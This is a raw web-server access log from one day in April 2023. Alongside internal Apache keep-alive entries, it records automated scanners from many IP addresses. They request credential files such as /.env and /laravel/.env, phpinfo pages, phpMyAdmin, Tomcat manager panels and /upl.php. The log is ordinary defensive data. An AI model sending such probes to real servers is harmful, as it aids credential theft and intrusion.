135.125.246.110 - - [04/Apr/2023:09:42:17 +0000] "POST / HTTP/1.1" 405 409698 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:10:05:03 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:10:05:05 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Apr/2023:10:35:50 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [04/Apr/2023:10:41:36 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.33.80.243 - - [04/Apr/2023:10:57:47 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [04/Apr/2023:11:13:47 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.110 - - [04/Apr/2023:11:14:24 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:11:37:17 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:11:37:19 +0000] "POST / HTTP/1.1" 405 409744 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.120.8.105 - - [04/Apr/2023:11:46:19 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.22.0"
::1 - - [04/Apr/2023:11:48:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:05 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:07 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:08 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:09 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:10 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:11 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:13 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:14 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:15 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:16 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:48:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:52 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:53 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:54 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:55 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:56 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:57 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:52:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:05 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:11:53:06 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
91.236.254.96 - - [04/Apr/2023:11:55:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.236.254.96 - - [04/Apr/2023:11:55:11 +0000] "POST / HTTP/1.1" 405 409712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozila/5.0"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /api/.env HTTP/1.1" 200 - "-" "Mozila/5.0"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /app/.env HTTP/1.1" 200 - "-" "Mozila/5.0"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /laravel/.env HTTP/1.1" 200 - "-" "Mozila/5.0"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /.env HTTP/1.1" 200 - "-" "Go-http-client/1.1"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /api/.env HTTP/1.1" 200 - "-" "Go-http-client/1.1"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /laravel/.env HTTP/1.1" 200 - "-" "Go-http-client/1.1"
91.236.254.96 - - [04/Apr/2023:11:58:35 +0000] "GET /app/.env HTTP/1.1" 200 - "-" "Go-http-client/1.1"
43.154.128.189 - - [04/Apr/2023:12:00:06 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
109.237.98.226 - - [04/Apr/2023:12:00:28 +0000] "\x16\x03\x01\x01H\x01" 400 226 "-" "-"
109.237.98.226 - - [04/Apr/2023:12:00:28 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [04/Apr/2023:12:00:28 +0000] "POST /.env HTTP/1.1" 405 411953 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
187.86.166.70 - - [04/Apr/2023:12:01:24 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
132.145.39.16 - - [04/Apr/2023:12:29:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "-"
132.145.39.16 - - [04/Apr/2023:12:29:43 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "-"
132.145.39.16 - - [04/Apr/2023:12:29:45 +0000] "GET /phpinfo HTTP/1.1" 200 - "-" "-"
132.145.39.16 - - [04/Apr/2023:12:29:46 +0000] "GET /phpinfo.php HTTP/1.1" 200 90455 "-" "-"
132.145.39.16 - - [04/Apr/2023:12:29:47 +0000] "GET /info.php HTTP/1.1" 200 - "-" "-"
132.145.39.16 - - [04/Apr/2023:12:29:48 +0000] "GET /php.php HTTP/1.1" 200 - "-" "-"
132.145.39.16 - - [04/Apr/2023:12:29:48 +0000] "GET /test.php HTTP/1.1" 200 - "-" "-"
82.64.66.202 - - [04/Apr/2023:12:44:27 +0000] "HEAD / HTTP/1.1" 200 - "-" "-"
82.64.66.202 - - [04/Apr/2023:12:44:28 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
185.254.196.173 - - [04/Apr/2023:13:07:05 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:13:07:05 +0000] "POST / HTTP/1.1" 405 409742 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.247.51.77 - - [04/Apr/2023:13:12:47 +0000] "\x16\x03\x01" 400 226 "-" "-"
35.247.51.77 - - [04/Apr/2023:13:12:50 +0000] "OPTIONS / HTTP/1.0" 200 - "-" "-"
20.171.30.204 - - [04/Apr/2023:13:15:46 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.171.30.204 - - [04/Apr/2023:13:15:47 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.171.30.204 - - [04/Apr/2023:13:15:48 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
43.154.128.189 - - [04/Apr/2023:13:19:24 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
::1 - - [04/Apr/2023:13:44:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [04/Apr/2023:13:44:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
135.125.246.110 - - [04/Apr/2023:13:48:56 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
144.255.17.178 - - [04/Apr/2023:13:58:35 +0000] "GET / HTTP/1.0" 200 41226 "-" "-"
165.232.185.56 - - [04/Apr/2023:13:59:48 +0000] "\x16\x03\x01" 400 226 "-" "-"
165.232.185.56 - - [04/Apr/2023:13:59:48 +0000] "\x16\x03\x01" 400 226 "-" "-"
165.232.185.56 - - [04/Apr/2023:13:59:49 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.232.185.56 - - [04/Apr/2023:13:59:50 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.232.185.56 - - [04/Apr/2023:13:59:50 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
165.232.185.56 - - [04/Apr/2023:13:59:51 +0000] "\x16\x03\x01" 400 226 "-" "-"
165.232.185.56 - - [04/Apr/2023:13:59:52 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.232.185.56 - - [04/Apr/2023:13:59:52 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
165.232.185.56 - - [04/Apr/2023:13:59:53 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
193.32.162.159 - - [04/Apr/2023:14:07:44 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.79.162.186 - - [04/Apr/2023:14:30:20 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.28.2"
84.194.151.235 - - [04/Apr/2023:14:35:24 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
84.194.151.235 - admin [04/Apr/2023:14:35:30 +0000] "GET /manager/html HTTP/1.1" 200 - "-" "-"
43.154.128.189 - - [04/Apr/2023:14:39:55 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.79.181.94 - - [04/Apr/2023:15:05:37 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [04/Apr/2023:15:10:29 +0000] "POST / HTTP/1.1" 405 409726 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
38.6.173.54 - - [04/Apr/2023:15:52:31 +0000] "HEAD /install/images/v2_logo.png HTTP/1.1" 200 - "-" "python-requests/2.27.1"
107.170.250.19 - - [04/Apr/2023:15:53:23 +0000] "GET /manager/text/list HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
43.154.128.189 - - [04/Apr/2023:16:00:19 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:16:05:07 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:16:05:08 +0000] "POST / HTTP/1.1" 405 409682 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Apr/2023:16:07:32 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.110 - - [04/Apr/2023:16:43:29 +0000] "POST / HTTP/1.1" 405 409706 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.172.21 - - [04/Apr/2023:16:59:12 +0000] "\x16\x03\x01" 400 226 "-" "-"
161.97.174.25 - - [04/Apr/2023:17:17:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
161.97.174.25 - - [04/Apr/2023:17:17:57 +0000] "POST / HTTP/1.1" 405 422667 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
43.154.128.189 - - [04/Apr/2023:17:19:09 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:17:37:15 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
